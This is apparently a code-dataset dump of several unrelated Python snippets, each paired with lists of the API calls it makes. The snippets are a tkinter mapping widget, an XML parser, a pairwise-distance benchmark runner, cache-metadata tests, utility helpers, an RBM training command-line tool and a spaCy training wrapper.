self.cb_source_ref.pack(side=LEFT, fill=X, expand=1)
# Data type label
self.l_data_type = ttk.Label(self, textvariable=self.src_datatype, width=8)
self.src_datatype.set("Not set")
self.l_data_type.pack(side=LEFT)
# Dest reference
self.cb_dest_ref = ttk.Combobox(self, textvariable=self.dest_reference, state='normal')
self.cb_dest_ref['values'] = self.get_destination_references()
self.cb_dest_ref.pack(side=RIGHT, fill=X, expand=1)
# Is key field
self.cb_is_key = ttk.Checkbutton(self, variable=self.is_key)
self.cb_is_key.pack(side=RIGHT)
# Current data
self.l_data = ttk.Label(self, textvariable=self.curr_data)
self.curr_data.set("No data")
self.l_data.pack(side=RIGHT, fill=X, padx=5)
|
[
"tkinter.StringVar",
"tkinter.ttk.Label",
"qal.common.strings.empty_when_none",
"tkinter.ttk.Combobox",
"tkinter.BooleanVar",
"qal.common.strings.bool_to_binary_int",
"tkinter.ttk.Checkbutton"
] |
[((978, 990), 'tkinter.BooleanVar', 'BooleanVar', ([], {}), '()\n', (988, 990), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1020, 1031), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1029, 1031), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1060, 1071), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1069, 1071), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1097, 1108), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1106, 1108), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1140, 1151), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1149, 1151), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1175, 1186), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1184, 1186), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1218, 1229), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1227, 1229), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((2784, 2851), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['self'], {'textvariable': 'self.src_reference', 'state': '"""normal"""'}), "(self, textvariable=self.src_reference, state='normal')\n", (2796, 2851), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3036, 3092), 'tkinter.ttk.Label', 'ttk.Label', (['self'], {'textvariable': 'self.src_datatype', 'width': '(8)'}), '(self, textvariable=self.src_datatype, width=8)\n', (3045, 3092), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3229, 3297), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['self'], {'textvariable': 'self.dest_reference', 'state': '"""normal"""'}), "(self, textvariable=self.dest_reference, state='normal')\n", (3241, 3297), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3478, 3521), 'tkinter.ttk.Checkbutton', 'ttk.Checkbutton', (['self'], {'variable': 'self.is_key'}), '(self, variable=self.is_key)\n', (3493, 3521), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3608, 3652), 'tkinter.ttk.Label', 'ttk.Label', (['self'], {'textvariable': 'self.curr_data'}), '(self, textvariable=self.curr_data)\n', (3617, 3652), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1819, 1858), 'qal.common.strings.bool_to_binary_int', 'bool_to_binary_int', (['self.mapping.is_key'], {}), '(self.mapping.is_key)\n', (1837, 1858), False, 'from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none\n'), ((1609, 1652), 'qal.common.strings.empty_when_none', 'empty_when_none', (['self.mapping.src_reference'], {}), '(self.mapping.src_reference)\n', (1624, 1652), False, 'from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none\n'), ((1691, 1735), 'qal.common.strings.empty_when_none', 'empty_when_none', (['self.mapping.dest_reference'], {}), '(self.mapping.dest_reference)\n', (1706, 1735), False, 'from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none\n')]
|
from lxml import etree
def parse_xml(content):
raw = {}
root = etree.fromstring(content, parser=etree.XMLParser(resolve_entities=False))
for child in root:
raw[child.tag] = child.text
return raw
|
[
"lxml.etree.XMLParser"
] |
[((106, 145), 'lxml.etree.XMLParser', 'etree.XMLParser', ([], {'resolve_entities': '(False)'}), '(resolve_entities=False)\n', (121, 145), False, 'from lxml import etree\n')]
|
# Copyright (C) 2017-2018 Intel Corporation
#
# SPDX-License-Identifier: MIT
import run_utils as utils
import numpy as np
import sys, os
import dpctl, dpctl.tensor as dpt
from dpbench_python.pairwise_distance.pairwise_distance_python import (
pairwise_distance_python,
)
from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file
######################################################
# GLOBAL DECLARATIONS THAT WILL BE USED IN ALL FILES #
######################################################
# make xrange available in python 3
try:
xrange
except NameError:
xrange = range
def gen_data(nopt, dims):
X, Y = gen_rand_data(nopt, dims)
return (X, Y, np.empty((nopt, nopt)))
def run(name, sizes=5, step=2, nopt=2 ** 10):
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"--steps", required=False, default=sizes, help="Number of steps"
)
parser.add_argument(
"--step", required=False, default=step, help="Factor for each step"
)
parser.add_argument(
"--size", required=False, default=nopt, help="Initial data size"
)
parser.add_argument(
"--repeat", required=False, default=1, help="Iterations inside measured region"
)
parser.add_argument(
"--text", required=False, default="", help="Print with each result"
)
parser.add_argument("-d", type=int, default=3, help="Dimensions")
parser.add_argument(
"--usm",
required=False,
action="store_true",
help="Use USM Shared or pure numpy",
)
parser.add_argument(
"--test",
required=False,
action="store_true",
help="Check for correctness by comparing output with naieve Python version",
)
args = parser.parse_args()
sizes = int(args.steps)
step = int(args.step)
nopt = int(args.size)
repeat = int(args.repeat)
dims = int(args.d)
clean_string = ["make", "clean"]
utils.run_command(clean_string, verbose=True)
if args.usm:
build_string = ["make", "comp"]
utils.run_command(build_string, verbose=True)
exec_name = "./pairwise_distance_comp"
else:
build_string = ["make"]
utils.run_command(build_string, verbose=True)
exec_name = "./pairwise_distance"
if args.test:
X, Y, p_D = gen_data(nopt, dims)
pairwise_distance_python(X, Y, p_D)
# run dpcpp
gen_data_to_file(nopt, dims)
# run the C program
run_cmd = [exec_name, str(nopt), str(1), "-t"]
utils.run_command(run_cmd, verbose=True)
# read output of dpcpp
n_D = np.fromfile("D.bin").reshape(nopt, nopt)
if np.allclose(n_D, p_D):
print("Test succeeded\n")
else:
print("Test failed\n")
return
if os.path.isfile("runtimes.csv"):
os.remove("runtimes.csv")
for i in xrange(sizes):
gen_data_to_file(nopt, dims)
# run the C program
run_cmd = [exec_name, str(nopt), str(repeat)]
utils.run_command(run_cmd, verbose=True)
nopt *= step
repeat -= step
if repeat < 1:
repeat = 1
if __name__ == "__main__":
run("Pairwise distance dpcpp")
|
[
"os.remove",
"argparse.ArgumentParser",
"numpy.fromfile",
"run_utils.run_command",
"numpy.empty",
"numpy.allclose",
"dpbench_python.pairwise_distance.pairwise_distance_python.pairwise_distance_python",
"os.path.isfile",
"dpbench_datagen.pairwise_distance.gen_data_to_file",
"dpbench_datagen.pairwise_distance.gen_rand_data"
] |
[((649, 674), 'dpbench_datagen.pairwise_distance.gen_rand_data', 'gen_rand_data', (['nopt', 'dims'], {}), '(nopt, dims)\n', (662, 674), False, 'from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file\n'), ((799, 824), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (822, 824), False, 'import argparse\n'), ((1976, 2021), 'run_utils.run_command', 'utils.run_command', (['clean_string'], {'verbose': '(True)'}), '(clean_string, verbose=True)\n', (1993, 2021), True, 'import run_utils as utils\n'), ((2845, 2875), 'os.path.isfile', 'os.path.isfile', (['"""runtimes.csv"""'], {}), "('runtimes.csv')\n", (2859, 2875), False, 'import sys, os\n'), ((693, 715), 'numpy.empty', 'np.empty', (['(nopt, nopt)'], {}), '((nopt, nopt))\n', (701, 715), True, 'import numpy as np\n'), ((2088, 2133), 'run_utils.run_command', 'utils.run_command', (['build_string'], {'verbose': '(True)'}), '(build_string, verbose=True)\n', (2105, 2133), True, 'import run_utils as utils\n'), ((2231, 2276), 'run_utils.run_command', 'utils.run_command', (['build_string'], {'verbose': '(True)'}), '(build_string, verbose=True)\n', (2248, 2276), True, 'import run_utils as utils\n'), ((2387, 2422), 'dpbench_python.pairwise_distance.pairwise_distance_python.pairwise_distance_python', 'pairwise_distance_python', (['X', 'Y', 'p_D'], {}), '(X, Y, p_D)\n', (2411, 2422), False, 'from dpbench_python.pairwise_distance.pairwise_distance_python import pairwise_distance_python\n'), ((2452, 2480), 'dpbench_datagen.pairwise_distance.gen_data_to_file', 'gen_data_to_file', (['nopt', 'dims'], {}), '(nopt, dims)\n', (2468, 2480), False, 'from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file\n'), ((2572, 2612), 'run_utils.run_command', 'utils.run_command', (['run_cmd'], {'verbose': '(True)'}), '(run_cmd, verbose=True)\n', (2589, 2612), True, 'import run_utils as utils\n'), ((2712, 2733), 'numpy.allclose', 'np.allclose', (['n_D', 'p_D'], {}), '(n_D, p_D)\n', (2723, 2733), True, 'import numpy as np\n'), ((2885, 2910), 'os.remove', 'os.remove', (['"""runtimes.csv"""'], {}), "('runtimes.csv')\n", (2894, 2910), False, 'import sys, os\n'), ((2948, 2976), 'dpbench_datagen.pairwise_distance.gen_data_to_file', 'gen_data_to_file', (['nopt', 'dims'], {}), '(nopt, dims)\n', (2964, 2976), False, 'from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file\n'), ((3068, 3108), 'run_utils.run_command', 'utils.run_command', (['run_cmd'], {'verbose': '(True)'}), '(run_cmd, verbose=True)\n', (3085, 3108), True, 'import run_utils as utils\n'), ((2659, 2679), 'numpy.fromfile', 'np.fromfile', (['"""D.bin"""'], {}), "('D.bin')\n", (2670, 2679), True, 'import numpy as np\n')]
|
import os
import time
from jme.stagecache.types import asset_types
from jme.stagecache.cache import Cache
from jme.stagecache.target import Target
from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata
import logging
logging.basicConfig(log_level=logging.DEBUG)
def test_cache_md():
test_dir = 'test/.cache.tmp'
cache = Cache(test_dir)
md = CacheMetadata(cache)
print(md.write_lock)
print(md.asset_list)
assert md.cache.cache_root.startswith(os.path.abspath(os.path.curdir))
# clean up from earlier tests
if os.path.exists(md.asset_list):
os.remove(md.asset_list)
if os.path.exists(md.write_lock):
os.remove(md.write_lock)
md.get_write_lock()
assert os.path.exists(md.write_lock)
md.release_write_lock()
assert not os.path.exists(md.write_lock)
t1 = Target('/some/path/1.txt', asset_types['file'])
t2 = Target('/some/path/2.txt', asset_types['file'])
tm1 = TargetMetadata(cache, t1.path_string, 'file')
tm2 = TargetMetadata(cache, t2.path_string, 'file')
md.add_cached_file(tm1, 10, int(time.time()) + 0)
md.add_cached_file(tm2, 20, int(time.time()) + 10000000)
cache_list = list(md.iter_cached_files())
assert len(cache_list) == 2
cache_list = list(md.iter_cached_files(locked=False))
assert len(cache_list) == 1
cache_list = list(md.iter_cached_files(locked=True))
assert len(cache_list) == 1
md.remove_cached_file(tm1)
cache_list = list(md.iter_cached_files())
assert len(cache_list) == 1
cache_list = list(md.iter_cached_files(locked=False))
assert len(cache_list) == 0
cache_list = list(md.iter_cached_files(locked=True))
assert len(cache_list) == 1
|
[
"os.path.abspath",
"os.remove",
"logging.basicConfig",
"jme.stagecache.text_metadata.TargetMetadata",
"os.path.exists",
"time.time",
"jme.stagecache.target.Target",
"jme.stagecache.cache.Cache",
"jme.stagecache.text_metadata.CacheMetadata"
] |
[((234, 278), 'logging.basicConfig', 'logging.basicConfig', ([], {'log_level': 'logging.DEBUG'}), '(log_level=logging.DEBUG)\n', (253, 278), False, 'import logging\n'), ((346, 361), 'jme.stagecache.cache.Cache', 'Cache', (['test_dir'], {}), '(test_dir)\n', (351, 361), False, 'from jme.stagecache.cache import Cache\n'), ((371, 391), 'jme.stagecache.text_metadata.CacheMetadata', 'CacheMetadata', (['cache'], {}), '(cache)\n', (384, 391), False, 'from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata\n'), ((560, 589), 'os.path.exists', 'os.path.exists', (['md.asset_list'], {}), '(md.asset_list)\n', (574, 589), False, 'import os\n'), ((631, 660), 'os.path.exists', 'os.path.exists', (['md.write_lock'], {}), '(md.write_lock)\n', (645, 660), False, 'import os\n'), ((731, 760), 'os.path.exists', 'os.path.exists', (['md.write_lock'], {}), '(md.write_lock)\n', (745, 760), False, 'import os\n'), ((849, 896), 'jme.stagecache.target.Target', 'Target', (['"""/some/path/1.txt"""', "asset_types['file']"], {}), "('/some/path/1.txt', asset_types['file'])\n", (855, 896), False, 'from jme.stagecache.target import Target\n'), ((906, 953), 'jme.stagecache.target.Target', 'Target', (['"""/some/path/2.txt"""', "asset_types['file']"], {}), "('/some/path/2.txt', asset_types['file'])\n", (912, 953), False, 'from jme.stagecache.target import Target\n'), ((964, 1009), 'jme.stagecache.text_metadata.TargetMetadata', 'TargetMetadata', (['cache', 't1.path_string', '"""file"""'], {}), "(cache, t1.path_string, 'file')\n", (978, 1009), False, 'from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata\n'), ((1020, 1065), 'jme.stagecache.text_metadata.TargetMetadata', 'TargetMetadata', (['cache', 't2.path_string', '"""file"""'], {}), "(cache, t2.path_string, 'file')\n", (1034, 1065), False, 'from jme.stagecache.text_metadata import CacheMetadata, TargetMetadata\n'), ((485, 516), 'os.path.abspath', 'os.path.abspath', (['os.path.curdir'], {}), '(os.path.curdir)\n', (500, 516), False, 'import os\n'), ((599, 623), 'os.remove', 'os.remove', (['md.asset_list'], {}), '(md.asset_list)\n', (608, 623), False, 'import os\n'), ((670, 694), 'os.remove', 'os.remove', (['md.write_lock'], {}), '(md.write_lock)\n', (679, 694), False, 'import os\n'), ((804, 833), 'os.path.exists', 'os.path.exists', (['md.write_lock'], {}), '(md.write_lock)\n', (818, 833), False, 'import os\n'), ((1103, 1114), 'time.time', 'time.time', ([], {}), '()\n', (1112, 1114), False, 'import time\n'), ((1157, 1168), 'time.time', 'time.time', ([], {}), '()\n', (1166, 1168), False, 'import time\n')]
|
import os
import re
import uuid
import logging
from typing import Union, List
from enum import Enum, auto
class UserResponse(Enum):
"""Enum for user's response.
Yes or No.
"""
YES = auto()
NO = auto()
def __eq__(self, other):
if self.__class__ is not other.__class__:
return False
if self.value == other.value:
return True
return False
def setup_logger(name: str) -> logging.Logger:
"""Set up logger.
Args:
name (str): name of logger.
Returns:
logger (logging.Logger): logger instance.
"""
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
handler_format = logging.Formatter(
'[%(levelname)s]: %(asctime)s - %(name)s: %(message)s'
)
handler.setFormatter(handler_format)
logger.addHandler(handler)
logger.propagate = False
return logger
def _atoi(text: str) -> Union[int, str]:
"""Convert ascii to integer.
Args:
text (str): string.
Returns:
Union[int, str]: integer if number, string otherwise.
"""
return int(text) if text.isdigit() else text
def natural_keys(text: str) -> Union[List[int], List[str]]:
"""Key for natural sorting
Args:
text (str): string
Returns:
Union[List[int], List[str]]: A list of mixed integer and strings.
"""
return [_atoi(c) for c in re.split(r'(\d+)', text)]
def show_info(obj: object, logger: logging.Logger) -> None:
"""Show info for given paramters.
Args:
obj (object): instance
"""
max_chars = max([len(key) for key in obj.__dict__])
for key in sorted(obj.__dict__):
logger.info(f'{key: <{max_chars}} -> {obj.__dict__[key]}')
def gen_random_filename(directory_name: str, extension: str) -> str:
"""Generate random filename in given directory.
Args:
directory_name (str): directory name.
extension (str): extension includes dot.
Returns:
path (str): random filename(absolute path).
"""
path = ''
while True:
random_filename = f'{uuid.uuid4().hex}{extension}'
path = os.path.join(directory_name, random_filename)
if os.path.exists(path):
continue
break
return path
def append_prefix(targets: Union[str, list[str], tuple[str]], prefix: str) -> tuple[str]:
"""Append prefix to targets.
Args:
targets (Union[str, list[str], tuple[str]]): target to add prefix.
prefix (str): string prefix.
Returns:
tuple[str]: tuple of string with prefix added
"""
if isinstance(targets, str):
return (prefix + targets,)
elif isinstance(targets, list) or isinstance(targets, tuple):
targets_prefix_added = []
for target in targets:
targets_prefix_added.append(prefix + target)
return tuple(targets_prefix_added)
def enumerate_with_step(elements, initial_number=0, step=1):
"""Enumerate with step.
Args:
elements (list): Elements.
initial_number (int, optional): Initial number. Defaults to 0.
step (int, optional): Step number. Defaults to 1.
Yields:
(key, value): Counted number and the value.
"""
for element in elements:
yield (initial_number, element)
initial_number += step
def ask() -> UserResponse:
"""Ask user to select yes or no.
This will continue forever until keyboard-interrupt occurres or the user inputs "Yes" or "No".
Returns:
UserResponse: User's response(Yes or No)
"""
user_input = ''
while not re.search(r'^[ynYN].*$', user_input):
user_input = input('Are you sure to execute?(y/n): ')
if re.search(r'^[yY].*$', user_input):
return UserResponse.YES
else:
return UserResponse.NO
|
[
"uuid.uuid4",
"re.split",
"os.path.join",
"logging.StreamHandler",
"os.path.exists",
"logging.Formatter",
"enum.auto",
"re.search",
"logging.getLogger"
] |
[((201, 207), 'enum.auto', 'auto', ([], {}), '()\n', (205, 207), False, 'from enum import Enum, auto\n'), ((217, 223), 'enum.auto', 'auto', ([], {}), '()\n', (221, 223), False, 'from enum import Enum, auto\n'), ((617, 640), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (634, 640), False, 'import logging\n'), ((691, 714), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (712, 714), False, 'import logging\n'), ((772, 845), 'logging.Formatter', 'logging.Formatter', (['"""[%(levelname)s]: %(asctime)s - %(name)s: %(message)s"""'], {}), "('[%(levelname)s]: %(asctime)s - %(name)s: %(message)s')\n", (789, 845), False, 'import logging\n'), ((3800, 3833), 're.search', 're.search', (['"""^[yY].*$"""', 'user_input'], {}), "('^[yY].*$', user_input)\n", (3809, 3833), False, 'import re\n'), ((2228, 2273), 'os.path.join', 'os.path.join', (['directory_name', 'random_filename'], {}), '(directory_name, random_filename)\n', (2240, 2273), False, 'import os\n'), ((2285, 2305), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2299, 2305), False, 'import os\n'), ((3692, 3727), 're.search', 're.search', (['"""^[ynYN].*$"""', 'user_input'], {}), "('^[ynYN].*$', user_input)\n", (3701, 3727), False, 'import re\n'), ((1485, 1509), 're.split', 're.split', (['"""(\\\\d+)"""', 'text'], {}), "('(\\\\d+)', text)\n", (1493, 1509), False, 'import re\n'), ((2183, 2195), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2193, 2195), False, 'import uuid\n')]
|
import numpy as np
import matplotlib.pyplot as plt
from rbm import RBM
import click
import gzip
import pickle
@click.group(context_settings={"help_option_names": ['-h', '--help']})
def cli():
"""Simple tool for training an RBM"""
pass
# @click.option('--target-path', type=click.Path(exists=True),
# help="path to the wavefunction data")
@cli.command("train")
@click.option('--train-path', default='../data/Ising2d_L4.pkl.gz',
show_default=True, type=click.Path(exists=True),
help="path to the training data")
@click.option('--save', type=click.Path(),
help="where to save the trained RBM parameters (if at all)")
@click.option('-n', '--num-hidden', default=None, type=int,
help=("number of hidden units in the RBM; defaults to "
"number of visible units"))
@click.option('-e', '--epochs', default=1000, show_default=True, type=int)
@click.option('-b', '--batch-size', default=100, show_default=True, type=int)
@click.option('-k', default=1, show_default=True, type=int,
help="number of Contrastive Divergence steps")
@click.option('-l', '--learning-rate', default=1e-3,
show_default=True, type=float)
@click.option('-m', '--momentum', default=0.5, show_default=True, type=float,
help=("value of the momentum parameter; ignored if "
"using SGD or Adam optimization"))
@click.option('--l1', default=0, show_default=True, type=float,
help="L1 regularization parameter")
@click.option('--l2', default=0, show_default=True, type=float,
help="L2 regularization parameter")
@click.option('--log-every', default=0, show_default=True, type=int,
help=("how often the validation statistics are recorded, "
"in epochs; 0 means no logging"))
@click.option('--seed', default=1234, show_default=True, type=int,
help="random seed to initialize the RBM with")
@click.option('-p', '--persistent', is_flag=True,
help="use Persistent Contrastive Divergence (PCD)")
@click.option('--persist-from', default=0, show_default=True, type=int,
help=("if PCD flag is given, use vanilla CD until the given "
"epoch, then switch to PCD"))
@click.option('--plot', is_flag=True)
@click.option('--no-prog', is_flag=True)
@click.option('--method', default='momentum', show_default=True,
type=click.Choice(["nesterov", "momentum", "sgd", "adam"]),
help="the optimization method to use")
def train(train_path, save, num_hidden, epochs, batch_size,
k, persistent, persist_from, learning_rate, momentum, l1, l2,
method, seed, log_every, plot, no_prog):
"""Train an RBM"""
# train_set = np.loadtxt(train_path)
# target_psi = np.loadtxt(target_path) if target_path is not None else None
with gzip.open(train_path) as f:
train_set = pickle.load(f, encoding='bytes')
num_hidden = train_set.shape[-1] if num_hidden is None else num_hidden
rbm = RBM(num_visible=train_set.shape[-1],
num_hidden=num_hidden,
seed=seed)
# learning_rate = schedulers.bounded_exponential_decay(0.1, 1e-6, epochs)
# momentum = schedulers.bounded_exponential_decay(0.5, 0.99, epochs)
nll_list = rbm.train(train_set, None, epochs,
batch_size, k=k,
persistent=persistent,
persist_from=persist_from,
lr=learning_rate,
momentum=momentum,
l1_reg=l1, l2_reg=l2,
beta1=0.9, beta2=0.999, epsilon=1e-8,
method=method,
log_every=log_every,
progbar=(not no_prog))
if save:
rbm.save(save)
if plot and nll_list:
fig, ax1 = plt.subplots(figsize=(10, 10))
ax1.plot(log_every * np.arange(len(nll_list)),
np.array(nll_list) / len(train_set), 'b')
ax1.set_xlabel("Epoch")
ax1.set_ylabel("NLL per training example", color='b')
ax1.tick_params('y', colors='b')
ax1.set_xlim(0, epochs)
if persistent and persist_from > 0:
# mark starting point of PCD if enabled and not zero
ax1.axvline(x=persist_from, linestyle=':', color='g')
# ax2 = ax1.twinx()
# ax2.plot(log_every * np.arange(len(overlap_list)),
# overlap_list, 'r')
# ax2.set_ylabel('Overlap', color='r')
# ax2.tick_params('y', colors='r')
# ax2.axhline(y=1, xmin=0, xmax=len(overlap_list),
# linestyle=':', color='r') # plot maximum overlap
plt.show()
# @cli.command("test")
# @click.option('--train-path', default='../c++/training_data.txt',
# show_default=True)
# @click.option('--target-path', default='../c++/target_psi.txt',
# show_default=True)
# @click.option('-n', '--num-hidden', default=None, type=int,
# help=("number of hidden units in the RBM; defaults to "
# "number of visible units"))
# @click.option('-k', default=1, show_default=True, type=int,
# help="number of Contrastive Divergence steps")
# @click.option('-e', '--epsilon', default=1e-8, show_default=True, type=float)
# @click.option('--seed', default=1234, show_default=True, type=int,
# help="random seed to initialize the RBM with")
# def test(train_path, target_path, num_hidden, k, epsilon, seed):
# """Tests the RBM's gradient computations"""
# train_set = np.loadtxt(train_path)
# target_psi = np.loadtxt(target_path)
# num_hidden = train_set.shape[-1] if num_hidden is None else num_hidden
# rbm = RBM(num_visible=train_set.shape[-1],
# num_hidden=num_hidden,
# seed=seed)
# rbm.test_gradients(train_set, target_psi, k, epsilon)
if __name__ == '__main__':
cli()
|
[
"gzip.open",
"matplotlib.pyplot.show",
"click.option",
"click.Choice",
"pickle.load",
"numpy.array",
"click.Path",
"rbm.RBM",
"click.group",
"matplotlib.pyplot.subplots"
] |
[((113, 182), 'click.group', 'click.group', ([], {'context_settings': "{'help_option_names': ['-h', '--help']}"}), "(context_settings={'help_option_names': ['-h', '--help']})\n", (124, 182), False, 'import click\n'), ((684, 826), 'click.option', 'click.option', (['"""-n"""', '"""--num-hidden"""'], {'default': 'None', 'type': 'int', 'help': '"""number of hidden units in the RBM; defaults to number of visible units"""'}), "('-n', '--num-hidden', default=None, type=int, help=\n 'number of hidden units in the RBM; defaults to number of visible units')\n", (696, 826), False, 'import click\n'), ((862, 935), 'click.option', 'click.option', (['"""-e"""', '"""--epochs"""'], {'default': '(1000)', 'show_default': '(True)', 'type': 'int'}), "('-e', '--epochs', default=1000, show_default=True, type=int)\n", (874, 935), False, 'import click\n'), ((937, 1013), 'click.option', 'click.option', (['"""-b"""', '"""--batch-size"""'], {'default': '(100)', 'show_default': '(True)', 'type': 'int'}), "('-b', '--batch-size', default=100, show_default=True, type=int)\n", (949, 1013), False, 'import click\n'), ((1015, 1125), 'click.option', 'click.option', (['"""-k"""'], {'default': '(1)', 'show_default': '(True)', 'type': 'int', 'help': '"""number of Contrastive Divergence steps"""'}), "('-k', default=1, show_default=True, type=int, help=\n 'number of Contrastive Divergence steps')\n", (1027, 1125), False, 'import click\n'), ((1136, 1223), 'click.option', 'click.option', (['"""-l"""', '"""--learning-rate"""'], {'default': '(0.001)', 'show_default': '(True)', 'type': 'float'}), "('-l', '--learning-rate', default=0.001, show_default=True,\n type=float)\n", (1148, 1223), False, 'import click\n'), ((1234, 1407), 'click.option', 'click.option', (['"""-m"""', '"""--momentum"""'], {'default': '(0.5)', 'show_default': '(True)', 'type': 'float', 'help': '"""value of the momentum parameter; ignored if using SGD or Adam optimization"""'}), "('-m', '--momentum', default=0.5, show_default=True, type=float,\n help=\n 'value of the momentum parameter; ignored if using SGD or Adam optimization'\n )\n", (1246, 1407), False, 'import click\n'), ((1434, 1537), 'click.option', 'click.option', (['"""--l1"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'float', 'help': '"""L1 regularization parameter"""'}), "('--l1', default=0, show_default=True, type=float, help=\n 'L1 regularization parameter')\n", (1446, 1537), False, 'import click\n'), ((1548, 1651), 'click.option', 'click.option', (['"""--l2"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'float', 'help': '"""L2 regularization parameter"""'}), "('--l2', default=0, show_default=True, type=float, help=\n 'L2 regularization parameter')\n", (1560, 1651), False, 'import click\n'), ((1662, 1827), 'click.option', 'click.option', (['"""--log-every"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'int', 'help': '"""how often the validation statistics are recorded, in epochs; 0 means no logging"""'}), "('--log-every', default=0, show_default=True, type=int, help=\n 'how often the validation statistics are recorded, in epochs; 0 means no logging'\n )\n", (1674, 1827), False, 'import click\n'), ((1858, 1975), 'click.option', 'click.option', (['"""--seed"""'], {'default': '(1234)', 'show_default': '(True)', 'type': 'int', 'help': '"""random seed to initialize the RBM with"""'}), "('--seed', default=1234, show_default=True, type=int, help=\n 'random seed to initialize the RBM with')\n", (1870, 1975), False, 'import click\n'), ((1986, 2091), 'click.option', 'click.option', (['"""-p"""', '"""--persistent"""'], {'is_flag': '(True)', 'help': '"""use Persistent Contrastive Divergence (PCD)"""'}), "('-p', '--persistent', is_flag=True, help=\n 'use Persistent Contrastive Divergence (PCD)')\n", (1998, 2091), False, 'import click\n'), ((2102, 2274), 'click.option', 'click.option', (['"""--persist-from"""'], {'default': '(0)', 'show_default': '(True)', 'type': 'int', 'help': '"""if PCD flag is given, use vanilla CD until the given epoch, then switch to PCD"""'}), "('--persist-from', default=0, show_default=True, type=int, help\n =\n 'if PCD flag is given, use vanilla CD until the given epoch, then switch to PCD'\n )\n", (2114, 2274), False, 'import click\n'), ((2300, 2336), 'click.option', 'click.option', (['"""--plot"""'], {'is_flag': '(True)'}), "('--plot', is_flag=True)\n", (2312, 2336), False, 'import click\n'), ((2338, 2377), 'click.option', 'click.option', (['"""--no-prog"""'], {'is_flag': '(True)'}), "('--no-prog', is_flag=True)\n", (2350, 2377), False, 'import click\n'), ((3074, 3144), 'rbm.RBM', 'RBM', ([], {'num_visible': 'train_set.shape[-1]', 'num_hidden': 'num_hidden', 'seed': 'seed'}), '(num_visible=train_set.shape[-1], num_hidden=num_hidden, seed=seed)\n', (3077, 3144), False, 'from rbm import RBM\n'), ((2906, 2927), 'gzip.open', 'gzip.open', (['train_path'], {}), '(train_path)\n', (2915, 2927), False, 'import gzip\n'), ((2954, 2986), 'pickle.load', 'pickle.load', (['f'], {'encoding': '"""bytes"""'}), "(f, encoding='bytes')\n", (2965, 2986), False, 'import pickle\n'), ((3932, 3962), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (3944, 3962), True, 'import matplotlib.pyplot as plt\n'), ((4778, 4788), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4786, 4788), True, 'import matplotlib.pyplot as plt\n'), ((492, 515), 'click.Path', 'click.Path', ([], {'exists': '(True)'}), '(exists=True)\n', (502, 515), False, 'import click\n'), ((594, 606), 'click.Path', 'click.Path', ([], {}), '()\n', (604, 606), False, 'import click\n'), ((2462, 2515), 'click.Choice', 'click.Choice', (["['nesterov', 'momentum', 'sgd', 'adam']"], {}), "(['nesterov', 'momentum', 'sgd', 'adam'])\n", (2474, 2515), False, 'import click\n'), ((4035, 4053), 'numpy.array', 'np.array', (['nll_list'], {}), '(nll_list)\n', (4043, 4053), True, 'import numpy as np\n')]
|
import logging
import os
import tempfile
from pathlib import Path
from uuid import uuid1
from py_profiler import profiler, profiling_service
from .command_line import run_command_line
from .utils import convert_to_spacy_doc_file
@profiler("train_spacy_model")
def train_spacy_model(
config_file: str,
vector_file: str,
train_file: str,
dev_file: str,
output_folder: str
):
with tempfile.TemporaryDirectory() as temp_dir:
tmp_train_file = f'{temp_dir}/{uuid1()}.spacy'
tmp_dev_file = f'{temp_dir}/{uuid1()}.spacy'
tmp_train_file = convert_to_spacy_doc_file(
train_file,
tmp_train_file,
dataset_size=None,
case_insensitive=True,
remove_accent=False
)
tmp_dev_file = convert_to_spacy_doc_file(
dev_file,
tmp_dev_file,
dataset_size=None,
case_insensitive=True,
remove_accent=False
)
run_command_line([
'python3',
'-m',
'spacy',
'train',
config_file,
'--output',
output_folder,
'--paths.train', tmp_train_file,
'--paths.dev', tmp_dev_file,
'--paths.vectors', vector_file
])
logging.info(profiling_service.as_table())
